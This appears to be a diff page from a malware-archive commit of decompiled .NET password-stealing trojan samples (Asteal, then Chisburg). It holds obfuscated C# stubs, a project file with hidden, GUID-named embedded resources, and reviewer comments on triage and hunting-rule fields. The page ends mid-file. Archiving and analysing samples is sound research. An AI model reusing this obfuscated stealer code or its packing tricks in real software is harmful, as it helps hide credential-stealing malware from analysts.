auto-decompiled msil via petikvx

add
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
@@ -0,0 +1,21 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security;
[assembly: AllowPartiallyTrustedCallers]
[assembly: SuppressIldasm]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyFileVersion("5.6.7.8")]
[assembly: AssemblyDescription("Do whatever you want")]
[assembly: AssemblyCopyright("Sup Inc.,")]
[assembly: AssemblyProduct("712638")]
[assembly: AssemblyTitle("RK's map")]
[assembly: AssemblyCompany("")]
[assembly: Guid("7a372557-d889-4df6-8495-e44dd22e054c")]
[assembly: ComVisible(true)]
[assembly: AssemblyVersion("1.2.3.4")]
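Review bot: This attribute file is the only C# file of the first sample without the decompiler's provenance header, so nothing in it records which binary it was exported from. Judging by `AssemblyVersion("1.2.3.4")` it probably belongs to the RK assembly, but that is inferred; once confirmed I would add a leading comment such as `// Assembly: RK, Version=1.2.3.4 (same sample as R_K\My\MySettings.cs)`. For triage, `[assembly: SuppressIldasm]`, the title `RK's map`, the `Guid` value and the mismatch between `AssemblyFileVersion("5.6.7.8")` and `AssemblyVersion` are the metadata fields here most likely to be useful in a hunting rule.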
@@ -0,0 +1,175 @@
// Decompiled with JetBrains decompiler
// Type: R_K.My.MySettings
// Assembly: RK, Version=1.2.3.4, Culture=neutral, PublicKeyToken=null
// MVID: 30CD1E36-C1DC-494F-9864-11C186F7E011
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283.exe
using \u0091\u008E\u008C\u008C\u008E\u0092\u008F\u0094\u0091\u0093\u0092\u0088\u008D\u008F\u008B\u008A\u008F\u0089\u0087\u008E\u008F\u0086\u008F\u008D\u008F\u0086\u0091\u0094\u0092\u008B\u0093\u008A\u008E\u0086\u0094\u0087;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace R_K.My
{
[CompilerGenerated]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance;
private static bool addedHandler;
private static object addedHandlerLockObject;
[MethodImpl(MethodImplOptions.NoInlining)]
static MySettings()
{
\u0093\u008D\u0088\u0095\u0092\u008D\u0086\u008A\u008D\u0087\u0094\u008B\u0090\u0088\u0087\u0091\u008F\u008F\u0088\u0095\u0090\u0087\u0086\u008E\u0093\u008F\u0093\u008E\u008A\u0086\u0089\u0086\u0093\u0086\u008A\u008F.\u008B\u008F\u008A\u0091\u0092\u0089\u008A\u0086\u008D\u0088\u008A\u0095\u008E\u0089\u008A\u0093\u008F\u0089\u008B\u0094\u0090\u0088\u0087\u008F\u0089\u008E\u008F\u0093\u0089\u0086\u0093\u008B\u008E\u008B\u0091\u0095();
int num1;
// ISSUE: reference to a compiler-generated method
if (!MySettings.\u008D\u0092\u0089\u0095\u0094\u008A\u008B\u0089\u008E\u0087\u008F\u0090\u008C\u0086\u008E\u008E\u0090\u0094\u0089\u0086\u008F\u0087\u008A\u0094\u0094\u0090\u0095\u008E\u0090\u0087\u0091\u0089\u0089\u0095\u0091\u0091())
num1 = 1;
else
goto label_6;
label_3:
int num2 = num1;
label_4:
do
{
switch (num2)
{
case 0:
case 1:
// ISSUE: reference to a compiler-generated method
MySettings.\u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091();
num2 = 4;
continue;
case 4:
goto label_2;
case 5:
goto label_5;
default:
goto label_7;
}
}
while (true);
goto label_9;
label_2:
// ISSUE: reference to a compiler-generated field
// ISSUE: object of a compiler-generated type is created
// ISSUE: reference to a compiler-generated method
MySettings.defaultInstance = (MySettings) MySettings.\u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091((object) new MySettings());
goto label_7;
label_5:
return;
label_9:
return;
label_6:
num2 = 3;
if (true)
goto label_4;
label_7:
// ISSUE: reference to a compiler-generated field
// ISSUE: reference to a compiler-generated method
MySettings.addedHandlerLockObject = MySettings.\u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(new object());
num1 = 5;
goto label_3;
}
[DebuggerNonUserCode]
[MethodImpl(MethodImplOptions.NoInlining)]
public MySettings()
{
}
[DebuggerNonUserCode]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[MethodImpl(MethodImplOptions.NoInlining)]
private static void AutoSaveSettings(object sender, EventArgs e)
{
}
public static MySettings Default
{
[MethodImpl(MethodImplOptions.NoInlining)] get => (MySettings) null;
}
[MethodImpl(MethodImplOptions.NoInlining)]
internal static void \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091()
{
}
[MethodImpl(MethodImplOptions.NoInlining)]
static object \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0)
{
return (object) null;
}
[MethodImpl(MethodImplOptions.NoInlining)]
static object \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0)
{
return (object) null;
}
[MethodImpl(MethodImplOptions.NoInlining)]
internal static bool \u0089\u008D\u0089\u0089\u0092\u0095\u0092\u0087\u008B\u0094\u008B\u008A\u0094\u008B\u008F\u008F\u0089\u0091\u008A\u0091\u0090\u008F\u0093\u008E\u008B\u0093\u008D\u008F\u0095\u008F\u0091\u0090\u0089\u0086\u008B\u0092() => true;
[MethodImpl(MethodImplOptions.NoInlining)]
internal static bool \u008D\u0092\u0089\u0095\u0094\u008A\u008B\u0089\u008E\u0087\u008F\u0090\u008C\u0086\u008E\u008E\u0090\u0094\u0089\u0086\u008F\u0087\u008A\u0094\u0094\u0090\u0095\u008E\u0090\u0087\u0091\u0089\u0089\u0095\u0091\u0091() => true;
[MethodImpl(MethodImplOptions.NoInlining)]
static void \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0)
{
}
[MethodImpl(MethodImplOptions.NoInlining)]
static object \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091() => (object) null;
[MethodImpl(MethodImplOptions.NoInlining)]
static bool \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0)
{
return true;
}
[MethodImpl(MethodImplOptions.NoInlining)]
static object \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091() => (object) null;
[MethodImpl(MethodImplOptions.NoInlining)]
static void \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0)
{
}
[MethodImpl(MethodImplOptions.NoInlining)]
static void \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0)
{
}
[MethodImpl(MethodImplOptions.NoInlining)]
static void \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0)
{
}
[MethodImpl(MethodImplOptions.NoInlining)]
static void \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0,
[In] object obj1)
{
}
[MethodImpl(MethodImplOptions.NoInlining)]
static void \u0086\u008A\u0093\u008D\u008B\u0090\u0094\u0092\u0089\u0094\u008A\u0091\u0088\u008F\u008F\u0090\u008B\u008F\u0088\u0089\u0095\u0087\u0091\u0092\u0095\u008E\u008B\u0089\u0095\u0091\u0092\u008A\u008E\u0094\u008D\u0091(
[In] object obj0)
{
}
}
}
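Review bot: The obfuscated helper methods from the `internal static void …()` stub down to the end of the class are decompiler stubs, not recovered logic. Several share one name and one signature (two `static object …([In] object obj0)`, five `static void …([In] object obj0)`, two `static object …()`), every body is empty or returns a constant, and `Default` returns `null`. As written the file cannot compile and says nothing about what the static constructor's calls actually do. A header comment along the lines of `// NOTE: method bodies were not recovered by the decompiler; read the IL of the original assembly for behaviour` would stop a reader treating these stubs as the sample's logic. The `switch (num2)` / `goto` structure in the static constructor looks like obfuscator-inserted control-flow flattening, which is worth stating in the same comment.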
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,66 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{F88A1E7E-FECE-4DDB-A6B4-9F156A0BF39E}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>RK</AssemblyName>
<ApplicationVersion>1.2.3.4</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E.cs" />
<Compile Include="_003CModule_003E{47562485-194B-4BC9-B0DC-38EFC00B1.cs" />
<Compile Include="_008E_0089_0092_0090_0090_008B_0095_008D_008B_0094_0093_0092_008D_008A_0094_0088_008F_0089_008D_0094_008C_0093_0086_0093_0094_0088_0095_0087_008A_0086_0088_0088_008D_0091_0087_008C\_008A_008E_0089_0095_0091_008D_0088_0094_0086_0092.cs" />
<Compile Include="_0094_0089_0093_0090_0093_0088_008B_0089_008D_008D_0095_008F_0095_0088_0092_0094_008B_008B_008E_008E_008D_008E_0094_008A_0095_0086_0095_0089_0086_0090_0095_008A_0093_008B_0090_008B\_0087_0087_008E_008D_0086_0092_0091_008B_008C_0093.cs" />
<Compile Include="_0094_0089_0093_0090_0093_0088_008B_0089_008D_008D_0095_008F_0095_0088_0092_0094_008B_008B_008E_008E_008D_008E_0094_008A_0095_0086_0095_0089_0086_0090_0095_008A_0093_008B_0090_008B\_008B_008F_008E_0095_008A_0095_0094_008C_008A_0090.cs" />
<Compile Include="_0094_0089_0093_0090_0093_0088_008B_0089_008D_008D_0095_008F_0095_0088_0092_0094_008B_008B_008E_008E_008D_008E_0094_008A_0095_0086_0095_0089_0086_0090_0095_008A_0093_008B_0090_008B\_008A_0091_008A_0086_0088_008D_008F_0086_008E_008A.cs" />
<Compile Include="_0094_0089_0093_0090_0093_0088_008B_0089_008D_008D_0095_008F_0095_0088_0092_0094_008B_008B_008E_008E_008D_008E_0094_008A_0095_0086_0095_0089_0086_0090_0095_008A_0093_008B_0090_008B\_0091_0095_008F_008B_0089_008E_008E_008D_0092_008B.cs" />
<Compile Include="_0094_0089_0093_0090_0093_0088_008B_0089_008D_008D_0095_008F_0095_0088_0092_0094_008B_008B_008E_008E_008D_008E_0094_008A_0095_0086_0095_0089_0086_0090_0095_008A_0093_008B_0090_008B\_0089_0088_008C_008A_008F_0089_008E_008A_008D_0089.cs" />
<Compile Include="_0094_0089_0093_0090_0093_0088_008B_0089_008D_008D_0095_008F_0095_0088_0092_0094_008B_008B_008E_008E_008D_008E_0094_008A_0095_0086_0095_0089_0086_0090_0095_008A_0093_008B_0090_008B\_008B_0091_0094_0086_0091_008A_0092_0090_008F_008D.cs" />
<Compile Include="_0094_0089_0093_0090_0093_0088_008B_0089_008D_008D_0095_008F_0095_0088_0092_0094_008B_008B_008E_008E_008D_008E_0094_008A_0095_0086_0095_0089_0086_0090_0095_008A_0093_008B_0090_008B\_0087_008E_008E_0086_0091_0091_0095_0095_0091_0088.cs" />
<Compile Include="_0094_0089_0093_0090_0093_0088_008B_0089_008D_008D_0095_008F_0095_0088_0092_0094_008B_008B_008E_008E_008D_008E_0094_008A_0095_0086_0095_0089_0086_0090_0095_008A_0093_008B_0090_008B\_008C_0086_0088_008F_008D_008A_0088_0087_0089_0087.cs" />
<Compile Include="_0091_008E_008C_008C_008E_0092_008F_0094_0091_0093_0092_0088_008D_008F_008B_008A_008F_0089_0087_008E_008F_0086_008F_008D_008F_0086_0091_0094_0092_008B_0093_008A_008E_0086_0094_0087\_0093_008D_0088_0095_0092_008D_0086_008A_008D_0087.cs" />
<Compile Include="R_K\My\MySettings.cs" />
<Compile Include="_008A_0087_008F_0087_0092_0091_0088_008E_0093_008D_0087_008E_008E_0088_0094_0091_0090_0088_0088_008F_0094_008F_0087_0091_0095_0089_0087_008E_0088_0093_0090_0094_0088_008D_008E_008B\_0095_0088_0088_0090_008C_0093_008B_008D_008C_008A.cs" />
<Compile Include="_008B_0086_0086_008F_008B_0093_0095_0092_008F_008E_0087_0086_0089_0089_0087_0092_008E_0087_0091_008D_008F_008A_0091_0093_0088_0090_0089_008F_0089_008E_0092_0090_008F_0089_0093_0091\_0095_0095_0086_0094_0088_0091_008D_0087_008C_0091.cs" />
<Compile Include="_008E_008D_0086_0086_0090_008A_0090_008F_008E_0091_0092_0090_0087_008A_0087_0091_0094_0086_008E_008E_0095_0091_0094_0093_008A_0087_0087_0086_008E_008D_008E_0092_008A_008A_008F_008D\_008C_0092_008B_008E_008C_008F_0092_0094_008C_0086.cs" />
<Compile Include="_0090_0086_0095_0092_008B_0088_0089_0090_008C_0088_0086_0095_008D_0091_008A_008F_008A_008F_008F_0094_008E_0087_0090_0089_0090_0089_0090_008B_008E_008C_0088_0094_008B_0090_0088_0092\_0092_0089_008F_0091_0090_008F_0094_0094_0086_0088.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="   " />
<EmbeddedResource Include="_008A_0087_008F_0087_0092_0091_0088_008E_0093_008D_0087_008E_008E_0088_0094_0091_0090_0088_0088_008F_0094_008F_0087_0091_0095_0089_0087_008E_0088_0093_0090_0094_0088_008D_008E_008B\_0095_0088_0088_0090_008C_0093_008B_008D_008C_008A_0091_008E_0089_0095_0088_008E_0094_008D_008F_008B_0089_0087_0087_0087_008F_008F_0089_0092_008C_0087_008E_0089_0092_0090_0088_0092.resx" />
<EmbeddedResource Include="1286ccb9-01dc-498b-84d2-3a004b81419d" />
<EmbeddedResource Include="a386bc81-f6ca-4da3-93b0-b3ee6391dc7c" />
<EmbeddedResource Include="a6538a39-a489-4fc0-b71d-56342f265087" />
<EmbeddedResource Include="R_K\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
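Review bot: `<EmbeddedResource Include="   " />` has a whitespace-only item name, and the three GUID-named resources that follow it carry no description of what they hold. In packed samples, resources like these often hold an encrypted payload, though nothing on this page confirms that here. A comment per resource recording its size and hash, for example `<!-- resource 1286ccb9-…: <size>, SHA-256 <placeholder> -->`, would make the project file usable for triage without loading it.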
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "RK", "Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283.csproj", "{F88A1E7E-FECE-4DDB-A6B4-9F156A0BF39E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{F88A1E7E-FECE-4DDB-A6B4-9F156A0BF39E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{F88A1E7E-FECE-4DDB-A6B4-9F156A0BF39E}.Debug|Any CPU.Build.0 = Debug|Any CPU
{F88A1E7E-FECE-4DDB-A6B4-9F156A0BF39E}.Release|Any CPU.ActiveCfg = Release|Any CPU
{F88A1E7E-FECE-4DDB-A6B4-9F156A0BF39E}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,12 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: RK, Version=1.2.3.4, Culture=neutral, PublicKeyToken=null
// MVID: 30CD1E36-C1DC-494F-9864-11C186F7E011
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283.exe
using \u0091\u008E\u008C\u008C\u008E\u0092\u008F\u0094\u0091\u0093\u0092\u0088\u008D\u008F\u008B\u008A\u008F\u0089\u0087\u008E\u008F\u0086\u008F\u008D\u008F\u0086\u0091\u0094\u0092\u008B\u0093\u008A\u008E\u0086\u0094\u0087;
internal class \u003CModule\u003E
{
static \u003CModule\u003E() => \u0093\u008D\u0088\u0095\u0092\u008D\u0086\u008A\u008D\u0087\u0094\u008B\u0090\u0088\u0087\u0091\u008F\u008F\u0088\u0095\u0090\u0087\u0086\u008E\u0093\u008F\u0093\u008E\u008A\u0086\u0089\u0086\u0093\u0086\u008A\u008F.\u008B\u008F\u008A\u0091\u0092\u0089\u008A\u0086\u008D\u0088\u008A\u0095\u008E\u0089\u008A\u0093\u008F\u0089\u008B\u0094\u0090\u0088\u0087\u008F\u0089\u008E\u008F\u0093\u0089\u0086\u0093\u008B\u008E\u008B\u0091\u0095();
}
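Review bot: The static constructor of `<Module>` is undocumented even though it is the earliest code visible for this assembly. It makes one call into the obfuscated namespace imported by the `using` line, and the same call opens the static constructor of `MySettings` and the `<Module>{47562485-…}` constructor in the next hunk. The target type is not on this page; by name it appears to live in the `_0091_008E_008C…\_0093_008D_0088…` file listed in the project. I would add `// Module initializer: the only statement is a call into the obfuscated runtime type; start static analysis at that type` above the constructor.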
@@ -0,0 +1,12 @@
// Decompiled with JetBrains decompiler
// Type: <Module>{47562485-194B-4BC9-B0DC-38EFC00B17FB}
// Assembly: RK, Version=1.2.3.4, Culture=neutral, PublicKeyToken=null
// MVID: 30CD1E36-C1DC-494F-9864-11C186F7E011
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Asteal.c-fddc20ed7bb8c128cb9eb52c01c034a0ed2664075ae218389375e9665be9a283.exe
using \u0091\u008E\u008C\u008C\u008E\u0092\u008F\u0094\u0091\u0093\u0092\u0088\u008D\u008F\u008B\u008A\u008F\u0089\u0087\u008E\u008F\u0086\u008F\u008D\u008F\u0086\u0091\u0094\u0092\u008B\u0093\u008A\u008E\u0086\u0094\u0087;
internal class \u003CModule\u003E\u007B47562485\u002D194B\u002D4BC9\u002DB0DC\u002D38EFC00B17FB\u007D
{
static \u003CModule\u003E\u007B47562485\u002D194B\u002D4BC9\u002DB0DC\u002D38EFC00B17FB\u007D() => \u0093\u008D\u0088\u0095\u0092\u008D\u0086\u008A\u008D\u0087\u0094\u008B\u0090\u0088\u0087\u0091\u008F\u008F\u0088\u0095\u0090\u0087\u0086\u008E\u0093\u008F\u0093\u008E\u008A\u0086\u0089\u0086\u0093\u0086\u008A\u008F.\u008B\u008F\u008A\u0091\u0092\u0089\u008A\u0086\u008D\u0088\u008A\u0095\u008E\u0089\u008A\u0093\u008F\u0089\u008B\u0094\u0090\u0088\u0087\u008F\u0089\u008E\u008F\u0093\u0089\u0086\u0093\u008B\u008E\u008B\u0091\u0095();
}
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: My.MyApplication
// Assembly: kripted, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F2186B1A-2E99-4A23-AA3D-671873E0755D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : ApplicationBase
{
}
}
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MyComputer
// Assembly: kripted, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F2186B1A-2E99-4A23-AA3D-671873E0755D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}
@@ -0,0 +1,108 @@
// Decompiled with JetBrains decompiler
// Type: My.MyProject
// Assembly: kripted, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F2186B1A-2E99-4A23-AA3D-671873E0755D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.ComponentModel.Design;
